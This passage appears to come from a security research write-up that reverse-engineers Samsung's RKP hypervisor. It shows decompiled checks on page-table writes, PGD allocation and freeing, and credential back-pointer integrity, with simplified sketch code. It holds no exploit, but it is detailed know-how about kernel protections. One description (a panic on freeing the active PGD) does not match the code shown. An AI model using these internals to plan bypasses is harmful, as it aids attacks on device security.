int64_t rkp_assign_cred_size(saved_regs_t* regs) {
  // ...
  // Save the size of the cred structure in `CRED_BUFF_SIZE`.
  cred_jar_size = regs->x2;
  rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
  // Save the size of the task_security_struct structure in `SP_BUFF_SIZE`.
  tsec_jar_size = regs->x3;
  rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
  return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}

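rkp_cmd_assign_ns_size calls rkp_assign_ns_size, which saves the size of the vfsmount structure, as well as the offsets of various fields of this structure, into the global variable called rkp_cred that we will detail later.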

int64_t rkp_assign_ns_size(saved_regs_t* regs) {
  // ...
  // The global variable must have been allocated.
  if (!rkp_cred) {
    return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
  }
  // The argument structure VA is converted into a PA.
  nsparam_user = rkp_get_pa(regs->x2);
  if (!nsparam_user) {
    return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
  }
  // It is copied into a local variable before extracting the various fields.
  memcpy(&nsparam, nsparam_user, sizeof(nsparam));
  // Save the size of the vfsmount structure.
  ns_buff_size = nsparam.ns_buff_size;
  ns_size = nsparam.ns_size;
  rkp_cred->NS_BUFF_SIZE = ns_buff_size;
  rkp_cred->NS_SIZE = ns_size;
  // Ensure the offsets of the fields are smaller than the vfsmount structure size.
  if (nsparam.bp_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  sb_offset = nsparam.sb_offset;
  if (nsparam.sb_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  flag_offset = nsparam.flag_offset;
  if (nsparam.flag_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  data_offset = nsparam.data_offset;
  if (nsparam.data_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  // Save the offsets of the various fields of the vfsmount structure.
  rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
  rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
  rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
  rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
  uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated  Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
  return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
                rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}
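
The validation and scaling performed by rkp_assign_ns_size can be isolated as follows. This is a sketch under stated assumptions: demo_ns_info_t is a hypothetical container (the real rkp_cred layout is not shown in this section), and unlike the decompiled function it validates all offsets before storing anything. The shifts are taken from the code above: pointer-sized fields are stored as 8-byte word indices and the flags field as a 4-byte word index.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors the ns_param_t layout quoted from include/linux/rkp.h. */
typedef struct ns_param {
    uint32_t ns_buff_size;
    uint32_t ns_size;
    uint32_t bp_offset;
    uint32_t sb_offset;
    uint32_t flag_offset;
    uint32_t data_offset;
} ns_param_t;

/* Hypothetical container for the saved values. */
typedef struct demo_ns_info {
    uint32_t bp_index;     /* bp_offset in 8-byte units */
    uint32_t sb_index;     /* sb_offset in 8-byte units */
    uint32_t flags_index;  /* flag_offset in 4-byte units */
    uint32_t data_index;   /* data_offset in 8-byte units */
} demo_ns_info_t;

/* Returns 0 on success, -1 if any offset lies beyond the structure size. */
int demo_assign_ns_size(const ns_param_t *in, demo_ns_info_t *out)
{
    if (in->bp_offset > in->ns_size || in->sb_offset > in->ns_size ||
        in->flag_offset > in->ns_size || in->data_offset > in->ns_size)
        return -1;
    out->bp_index = in->bp_offset >> 3;
    out->sb_index = in->sb_offset >> 3;
    out->flags_index = in->flag_offset >> 2;
    out->data_index = in->data_offset >> 3;
    return 0;
}
```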

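Modifying Page Tables¶

In the Page Tables Processing section, we saw that most of the kernel page tables are made read-only in the second stage. But what happens when the kernel needs to modify its page table entries? This is what we will see in this section.

On the kernel side, the entries are modified, for each level, in the set_pud, set_pmd, and set_pte functions.

For PUDs and PMDs, set_pud and set_pmd first check whether the page is protected by calling the rkp_is_pg_protected function (which uses ro_bitmap). If the page is indeed protected, they invoke the RKP_WRITE_PGT1 and RKP_WRITE_PGT2 commands respectively instead of performing the write directly.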

▸ arch/arm64/include/asm/pgtable.h

static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pudp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pudp), "r" (pud)
        : "x1", "x2", "memory");
    }
#else
    *pudp = pud;
#endif
    dsb(ishst);
    isb();
}

▸ arch/arm64/include/asm/pgtable.h

static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pmdp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pmdp), "r" (pmd)
        : "x1", "x2", "memory");
    }
#else
    *pmdp = pmd;
#endif
    dsb(ishst);
    isb();
}
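
The pattern shared by set_pud and set_pmd is a dispatch: write through the hypervisor when the target is protected, write directly otherwise. The toy model below illustrates only that dispatch. It assumes a bitmap with one bit per table entry (the real ro_bitmap tracks pages), replaces the hypercall with a counted function call, and uses hypothetical demo_ names throughout.

```c
#include <assert.h>
#include <stdint.h>

#define DEMO_ENTRIES 8u

uint64_t demo_table[DEMO_ENTRIES];  /* toy page table */
uint8_t  demo_ro_bitmap;            /* bit i set: entry i is protected */
unsigned demo_hypercalls;           /* writes that went through the "hypervisor" */

/* Stand-in for rkp_is_pg_protected. */
int demo_is_protected(unsigned idx)
{
    return (demo_ro_bitmap >> idx) & 1u;
}

/* Stand-in for the RKP_WRITE_PGTx commands: the hypervisor performs the write. */
void demo_hyp_write(unsigned idx, uint64_t val)
{
    demo_hypercalls++;
    demo_table[idx] = val;
}

/* Same shape as set_pud/set_pmd: hypercall if protected, direct store if not. */
void demo_set_entry(unsigned idx, uint64_t val)
{
    if (idx >= DEMO_ENTRIES)
        return;
    if (demo_is_protected(idx))
        demo_hyp_write(idx, val);
    else
        demo_table[idx] = val;
}
```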

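For PTs, set_pte also checks whether the page is protected, but in addition it calls rkp_is_pg_dbl_mapped to check whether the physical page is already mapped elsewhere in virtual memory (using dbl_bitmap). This way, the kernel can detect double mappings.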

▸ arch/arm64/include/asm/pgtable.h

static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
    /* bug on double mapping */
    BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));

    if (rkp_is_pg_protected((u64)ptep)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (ptep), "r" (pte)
        : "x1", "x2", "memory");
    }
#else
    *ptep = pte;
#endif
    /*
     * Only if the new pte is valid and kernel, otherwise TLB maintenance
     * or update_mmu_cache() have the necessary barriers.
     */
    if (pte_valid_not_user(pte)) {
        dsb(ishst);
        isb();
    }
}

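On the hypervisor side, the rkp_cmd_write_pgtx functions simply call the corresponding rkp_lxpgt_write function after incrementing a counter.

We will now detail the checks performed by the hypervisor when an entry is modified at each page table level.

First Level¶

rkp_l1pgt_write handles writes to first-level tables (or PUDs). It first ensures that the PUD is marked as L1 in the physmap, unless RKP is not deferred initialized. It then processes the old descriptor value: unmapping blocks is not allowed, and tables are handled by the rkp_l2pgt_process_table function. It also processes the new descriptor value: mapping blocks is not allowed, tables are handled by the rkp_l2pgt_process_table function, and the PXN bit is set for user PUDs. Finally, the descriptor value is updated.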

uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
  // ...
  // Convert the PUD descriptor VA into a PA.
  pudp_pa = rkp_get_pa(pudp);
  // Get the old/current value of the PUD descriptor.
  pud_old = *pudp_pa;
  rkp_phys_map_lock(pudp_pa);
  // Ensure the PUD is marked as such in the physmap.
  if (!is_phys_map_l1(pudp_pa)) {
    // If it is not, but RKP is not deferred initialized, perform the write.
    if (!rkp_deferred_inited) {
      set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
      return rkp_phys_map_unlock(pudp_pa);
    }
    // Otherwise, trigger a policy violation.
    rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
  }
  // Check if this is a kernel or user PUD using the physmap.
  is_kernel = is_phys_map_kernel(pudp_pa);
  // The old descriptor was valid.
  if (pud_old) {
    // The old descriptor was not a table, thus was a block.
    if ((pud_old & 0b11) != 0b11) {
      // Unmapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
    }
    // The old descriptor was a table, call `rkp_l2pgt_process_table` to process the old PMD.
    res = rkp_l2pgt_process_table(pud_old & 0xfffffffff000, (pudp_pa << 27) & 0x7fc0000000, 0 /* free */);
  }
  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // The new descriptor is valid.
  if (pud_new) {
    // Get the VA mapped by the PUD descriptor.
    addr = start_addr | (pudp_pa << 27) & 0x7fc0000000;
    // The new descriptor is not a table, thus is a block.
    if ((pud_new & 0b11) != 0b11) {
      // Mapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
    }
    // The new descriptor is a table, call `rkp_l2pgt_process_table` to process the new PMD.
    res = rkp_l2pgt_process_table(pud_new & 0xfffffffff000, addr, 1 /* alloc */);
    // For user PUD, set the PXN bit of the PUD descriptor.
    if (!is_kernel) {
      set_pxn_bit_of_desc(&pud_new, 1);
    }
    // ...
  }
  if (res) {
    uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
    return rkp_phys_map_unlock(pudp_pa);
  }
  // Finally, perform the write of the PUD descriptor on behalf of the kernel.
  set_entry_of_pgt(pudp_pa, pud_new);
  return rkp_phys_map_unlock(pudp_pa);
}
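
The expression `(pudp_pa << 27) & 0x7fc0000000` used above is easier to follow once split in two steps: take the index of the 8-byte descriptor within its 4 KiB table, then multiply it by the 1 GiB covered by each first-level entry. The sketch below shows both forms side by side, assuming a 4 KiB granule as implied by the masks in the decompiled code. The demo_ function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Index of an 8-byte descriptor inside its 4 KiB table (0..511). */
uint64_t demo_desc_index(uint64_t desc_pa)
{
    return (desc_pa & 0xfff) >> 3;
}

/* VA offset covered by a first-level (PUD) descriptor: 1 GiB per entry. */
uint64_t demo_l1_va_offset(uint64_t pudp_pa)
{
    return demo_desc_index(pudp_pa) << 30;
}

/* The same computation, written as in the decompiled code. */
uint64_t demo_l1_va_offset_raw(uint64_t pudp_pa)
{
    return (pudp_pa << 27) & 0x7fc0000000ULL;
}

/* A table descriptor has its two low bits set; a valid entry without is a block. */
int demo_is_table_desc(uint64_t desc)
{
    return (desc & 3) == 3;
}
```

The second-level computation in rkp_l2pgt_write follows the same idea with a shift of 18 and a mask of 0x3fe00000, that is, 2 MiB per entry.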

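Second Level¶

rkp_l2pgt_write handles writes to second-level tables (or PMDs). It first ensures that the PMD is marked as L2 in the physmap (if it is not, the write is performed directly when RKP is not deferred initialized, and the mismatch is only logged otherwise). It then processes the old and new descriptor values using the check_single_l2e function. If either the old or the new descriptor maps protected memory, the write is disallowed. Finally, if both checks pass, the new descriptor value is written.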

uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
  // ...
  // Convert the PMD descriptor VA into a PA.
  pmdp_pa = rkp_get_pa(pmdp);
  // Get the old/current value of the PMD descriptor.
  pmd_old = *pmdp_pa;
  rkp_phys_map_lock(pmdp_pa);
  // Ensure the PMD is marked as such in the physmap.
  if (!is_phys_map_l2(pmdp_pa)) {
    // If RKP is deferred initialized, continue with the processing.
    if (rkp_deferred_inited) {
      uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
    }
    // Otherwise, perform the write.
    else {
      set_entry_of_pgt(pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  is_flag3 = is_phys_map_flag3(pmdp_pa);
  // Check if this is a kernel or user PMD using the physmap.
  is_kernel = is_phys_map_kernel(pmdp_pa);
  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // Get the VA mapped by the PMD descriptor.
  addr = (pmdp_pa << 18) & 0x3fe00000 | ((is_flag3 & 0x1ff) << 30) | start_addr;
  // If the old descriptor was valid.
  if (pmd_old) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(pmdp_pa, addr, 0 /* free */);
    // If the old descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  // If the new descriptor is valid.
  if (pmd_new) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(&pmd_new, addr, 1 /* alloc */);
    // If the new descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
    // ...
  }
  // Finally, perform the write of the PMD descriptor on behalf of the kernel.
  set_entry_of_pgt(pmdp_pa, pmd_new);
  return rkp_phys_map_unlock(pmdp_pa);
}

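Third Level¶

rkp_l3pgt_write handles writes to third-level tables (or PTs). There is a special case when the descriptor maps virtual memory located right before the kernel text section: its PXN bit is set and the write is performed. Otherwise, the write is allowed if the PT is marked as L3 or FREE in the physmap and either the new descriptor is not a page descriptor, or its PXN bit is set, or RKP is not deferred initialized.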

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...
  // Convert the PT descriptor VA into a PA.
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  // If the PT is marked as such in the physmap, or as `FREE`.
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    // If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
    if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    }
    // Otherwise, the check fails if RKP is deferred initialized.
    else {
      allowed = rkp_deferred_inited == 0;
    }
  }
  // If the PT is marked as something else, the check also fails.
  else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  cs_enter(&l3pgt_lock);
  // In the special case where the descriptor is in the same page as the descriptor that maps the start of the kernel
  // text section and maps memory that is before the start of the kernel text section.
  if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xfff) {
    // Set the PXN bit of the new descriptor value.
    if (pte_val) {
      pte_val |= (1ULL << 53);
    }
    cs_exit(&l3pgt_lock);
    // And perform the write on behalf of the kernel.
    return set_entry_of_pgt(ptep_pa, pte_val);
  }
  cs_exit(&l3pgt_lock);
  // If the check failed, trigger a policy violation.
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  // Otherwise, perform the write of the PT descriptor on behalf of the kernel.
  return set_entry_of_pgt(ptep_pa, pte_val);
}
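
The two decisions made by rkp_l3pgt_write can be expressed as pure functions, which makes the conditions easier to test in isolation. This is a sketch only: the physmap lookup is replaced by a boolean parameter, the function names are hypothetical, and bit 53 is used for PXN as in the decompiled code above.

```c
#include <assert.h>
#include <stdint.h>

#define DEMO_PXN_BIT (1ULL << 53)

/* Mirrors the computation of `allowed` in rkp_l3pgt_write. */
int demo_l3_write_allowed(int is_l3_or_free, uint64_t pte, int deferred_inited)
{
    if (!is_l3_or_free)
        return 0;              /* page tagged as something else in the physmap */
    if ((pte & 3) != 3)
        return 1;              /* not a page descriptor */
    if (pte & DEMO_PXN_BIT)
        return 1;              /* non-executable at EL1 */
    return !deferred_inited;   /* executable mappings only before deferred init */
}

/* Special case: same 4 KiB table as the descriptor mapping stext, but before it. */
int demo_before_stext_same_page(uint64_t ptep_pa, uint64_t stext_ptep)
{
    return stext_ptep != 0 && ptep_pa < stext_ptep &&
           (ptep_pa ^ stext_ptep) <= 0xfff;
}
```

The XOR test works because two addresses within the same 4 KiB page only differ in their low 12 bits.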

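Allocating and Freeing PGDs¶

In addition to modifying the descriptors contained in PUDs, PMDs, and PTs, the kernel also needs to allocate, and sometimes free, PGDs.

On the kernel side, PGD allocation is done by the pgd_alloc function. It calls rkp_ro_alloc to get a read-only page from the hypervisor, then invokes the RKP_NEW_PGD command to notify RKP that this page will be a PGD.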

▸ arch/arm64/mm/pgd.c

pgd_t *pgd_alloc(struct mm_struct *mm)
{
    // ...
    pgd_t *ret = NULL;

    ret = (pgd_t *) rkp_ro_alloc();
    if (!ret) {
        if (PGD_SIZE == PAGE_SIZE)
            ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
        else
            ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
    }
    if(unlikely(!ret)) {
        pr_warn("%s: pgd alloc is failed\n", __func__);
        return ret;
    }
    uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);
    return ret;
    // ...
}

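PGD freeing is done by the pgd_free function. It invokes the RKP_FREE_PGD command to notify RKP that this page will no longer be a PGD, then calls rkp_ro_free to hand the page back to the hypervisor.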

▸ arch/arm64/mm/pgd.c

void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
    // ...
    uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);

    /* if pgd memory come from read only buffer, the put it back */
    /*TODO: use a macro*/
    if (is_rkp_ro_page((u64)pgd))
        rkp_ro_free((void *)pgd);
    else {
        if (PGD_SIZE == PAGE_SIZE)
            free_page((unsigned long)pgd);
        else
            kmem_cache_free(pgd_cache, pgd);
    }
    // ...
}

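On the hypervisor side, the rkp_cmd_new_pgd function ends up calling rkp_l1pgt_new_pgd after incrementing a counter. This function does not allow allocating swapper_pg_dir, idmap_pg_dir, or tramp_pg_dir. If RKP is initialized, it calls rkp_l1pgt_process_table to process the new PGD (assumed to be a user PGD).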

void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
  // ...

  // Convert the PGD VA into a PA.
  pgdp = rkp_get_pa(regs->x2) & 0xfffffffffffff000;
  // The allocated PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
    rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
  }
  // If RKP is initialized, process the new PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 1 /* alloc */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}

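The rkp_cmd_free_pgd function ends up calling rkp_l1pgt_free_pgd after incrementing a counter. This function does not allow freeing swapper_pg_dir, idmap_pg_dir, or tramp_pg_dir. If RKP is initialized, it calls rkp_l1pgt_process_table to process the old PGD, unless it is the currently active user or kernel PGD, in which case an error is raised and the hypervisor panics.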

void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
  // ...

  // Convert the PGD VA into a PA.
  pgd_pa = rkp_get_pa(regs->x2);
  pgdp = pgd_pa & 0xfffffffffffff000;
  // The freed PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
    uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
           ID_MAP_PGD);
    rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
  }
  // If RKP is initialized, process the old PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    // Unless this is the active user or kernel PGD (retrieved by checking the system register TTBRn_EL1 value).
    if ((get_ttbr0_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000) ||
        (get_ttbr1_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000)) {
      uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
             get_ttbr0_el1(), get_ttbr1_el1());
    }
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 0 /* free */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}
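
The reserved-PGD test shared by both functions can be isolated as a small predicate. The following is a minimal sketch, not the hypervisor's code: the reserved_pgds_t type and the pgd_is_reserved name are hypothetical, and the three addresses stand in for INIT_MM_PGD, ID_MAP_PGD, and TRAMP_PGD.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical container for the physical addresses of the reserved PGDs. */
typedef struct {
  uint64_t init_mm_pgd; /* stands in for swapper_pg_dir */
  uint64_t id_map_pgd;  /* stands in for idmap_pg_dir */
  uint64_t tramp_pgd;   /* stands in for tramp_pg_dir, 0 if the kernel has none */
} reserved_pgds_t;

/* Returns true if the page containing `pgd_pa` is one of the reserved PGDs. */
bool pgd_is_reserved(const reserved_pgds_t* r, uint64_t pgd_pa) {
  /* Same page-alignment mask as in the listings above. */
  uint64_t pgdp = pgd_pa & 0xfffffffffffff000ULL;
  /* The trampoline PGD is optional, so it only matches when it is set. */
  return pgdp == r->init_mm_pgd || pgdp == r->id_map_pgd ||
         (r->tramp_pgd != 0 && pgdp == r->tramp_pgd);
}
```

The guard on tramp_pgd matters: without it, a kernel that has no trampoline PGD would see every address in the zero page rejected as reserved.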

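Credentials Protection¶

Kernel Structures¶

In the "Protecting Kernel Data" section, we saw that the cred and task_security_struct structures are now allocated on read-only pages provided by the hypervisor. The kernel therefore can no longer modify them directly. In addition, new fields are added to these structures for Data Flow Integrity (DFI) purposes. In particular, each structure now has a "back-pointer", i.e. a pointer to the structure that owns it:

the task_struct for the cred structure;
the cred structure for the task_security_struct.

The cred structure also gets a back-pointer to the PGD of the owning task, as well as a "use counter" that prevents reusing the cred structure of another task_struct (in particular, one might try to reuse the credentials of the init task).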

▸ include/linux/cred.h

struct cred {
    // ...
    atomic_t *use_cnt;
    struct task_struct *bp_task;
    void *bp_pgd;
    unsigned long long type;
} __randomize_layout;

▸ security/selinux/include/objsec.h

struct task_security_struct {
    // ...
    void *bp_cred;
};

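These back-pointers and values are verified when a SELinux hook is executed, through a call to security_integrity_current. On our research device, the call to this function is missing, so in this section we look at the source code of another Samsung device that has it.

The kernel macros call_void_hook and call_int_hook contain the call to security_integrity_current.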

▸ security/security.c

#define call_void_hook(FUNC, ...)               \
    do {                            \
        struct security_hook_list *P;           \
                                \
        if(security_integrity_current()) break; \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) \
            P->hook.FUNC(__VA_ARGS__);      \
    } while (0)

#define call_int_hook(FUNC, IRC, ...) ({            \
    int RC = IRC;                       \
    do {                            \
        struct security_hook_list *P;           \
                                \
        RC = security_integrity_current();      \
        if (RC != 0)                            \
            break;                              \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
            RC = P->hook.FUNC(__VA_ARGS__);     \
            if (RC != 0)                \
                break;              \
        }                       \
    } while (0);                        \
    RC;                         \
})

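security_integrity_current first calls rkp_is_valid_cred_sp to verify that the credentials and security structures are allocated from hypervisor-protected pages. It then calls cmp_sec_integrity to verify the integrity of the credentials, and cmp_ns_integrity to verify the integrity of the mount namespace.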

▸ security/selinux/hooks.c

int security_integrity_current(void)
{
    rcu_read_lock();
    if ( rkp_cred_enable && 
        (rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
        cmp_sec_integrity(current_cred(),current->mm)||
        cmp_ns_integrity())) {
        rkp_print_debug();
        rcu_read_unlock();
        panic("RKP CRED PROTECTION VIOLATION\n");
    }
    rcu_read_unlock();
    return 0;
}

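rkp_is_valid_cred_sp ensures that the credentials and security structures are protected by the hypervisor. init_cred and init_sec form a valid pair. For any other pair, the start and the end of each structure must lie in read-only pages allocated by the hypervisor. In addition, the back-pointer of the task_security_struct must point to the expected cred structure.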

▸ security/selinux/hooks.c

extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
        struct task_security_struct *tsec = (struct task_security_struct *)sp;

        if((cred == (u64)&init_cred) && 
            ( sp == (u64)&init_sec)){
            return 0;
        }
        if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
            (!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
            return 1;
        }
        if((u64)tsec->bp_cred != cred) {
            return 1;
        }
        return 0;
}
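
Checking both the first and the last byte of each structure matters because an object can straddle a page boundary. The sketch below illustrates this with a made-up protection predicate; demo_is_ro_page and demo_struct_is_protected are hypothetical names, and the single protected page at 0x10000 is an assumption chosen for the example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define DEMO_PAGE_SIZE 0x1000ULL

/* Hypothetical predicate: pretend only the page at 0x10000 is protected. */
bool demo_is_ro_page(uint64_t addr) {
  return (addr & ~(DEMO_PAGE_SIZE - 1)) == 0x10000ULL;
}

/* Accept a structure only if its first and last bytes are on protected pages. */
bool demo_struct_is_protected(uint64_t addr, uint64_t size) {
  return demo_is_ro_page(addr) && demo_is_ro_page(addr + size - 1);
}
```

With these definitions, a 0x20-byte object at 0x10ff0 is rejected because its tail spills into the unprotected page at 0x11000, even though its first byte is protected.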

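cmp_sec_integrity checks that the task back-pointer of the cred is the current task_struct. When the task has a memory descriptor and is not running in interrupt context, it also checks that the PGD back-pointer of the cred matches the PGD of the current memory descriptor; this comparison is skipped when the back-pointer is swapper_pg_dir.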

▸ security/selinux/hooks.c

static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
    return ((cred->bp_task != current) || 
            (mm && (!( in_interrupt() || in_softirq())) && 
            (cred->bp_pgd != swapper_pg_dir) &&
            (mm->pgd != cred->bp_pgd)));    
}
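
The back-pointer scheme can be modeled in user space to see why reusing another task's credentials is detected. This is a simplified sketch under stated assumptions: the demo_task, demo_cred, and demo_tsec structures are hypothetical reductions of task_struct, cred, and task_security_struct, and demo_integrity_ok merges the checks of rkp_is_valid_cred_sp and cmp_sec_integrity while ignoring the interrupt-context and swapper_pg_dir special cases.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct demo_cred;

/* Reduced task_struct: only the fields involved in the check. */
struct demo_task {
  struct demo_cred* cred;
  void* pgd;
};

/* Reduced task_security_struct with its back-pointer to the cred. */
struct demo_tsec {
  struct demo_cred* bp_cred;
};

/* Reduced cred with its back-pointers to the owning task and PGD. */
struct demo_cred {
  struct demo_tsec* security;
  struct demo_task* bp_task;
  void* bp_pgd;
};

/* Returns true when every back-pointer points to the expected owner. */
bool demo_integrity_ok(const struct demo_task* t) {
  const struct demo_cred* c = t->cred;
  if (c == NULL || c->security == NULL) {
    return false;
  }
  return c->bp_task == t && c->security->bp_cred == c && c->bp_pgd == t->pgd;
}
```

If an attacker with a kernel write primitive points one task's cred field at the credentials of a more privileged task, the bp_task comparison fails, because the stolen structure still names its original owner and the attacker cannot rewrite a read-only page.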

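Protection Initialization¶

To be able to modify the cred structure of a process on behalf of the kernel, and to validate the values of its fields, the hypervisor needs to know its layout as well as the layout of the task_struct structure.

On the kernel side, the function that does this is kdp_init. It calls the RKP_KDP_X40 command with the offsets RKP needs, as well as the virtual addresses of the verifiedbootstate and ss_initialized global variables.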

▸ init/main.c

void kdp_init(void)
{
    kdp_init_t cred;

    cred.credSize   = sizeof(struct cred);
    cred.sp_size    = rkp_get_task_sec_size();
    cred.pgd_mm     = offsetof(struct mm_struct,pgd);
    cred.uid_cred   = offsetof(struct cred,uid);
    cred.euid_cred  = offsetof(struct cred,euid);
    cred.gid_cred   = offsetof(struct cred,gid);
    cred.egid_cred  = offsetof(struct cred,egid);
    cred.bp_pgd_cred    = offsetof(struct cred,bp_pgd);
    cred.bp_task_cred   = offsetof(struct cred,bp_task);
    cred.type_cred      = offsetof(struct cred,type);
    cred.security_cred  = offsetof(struct cred,security);
    cred.usage_cred     = offsetof(struct cred,use_cnt);
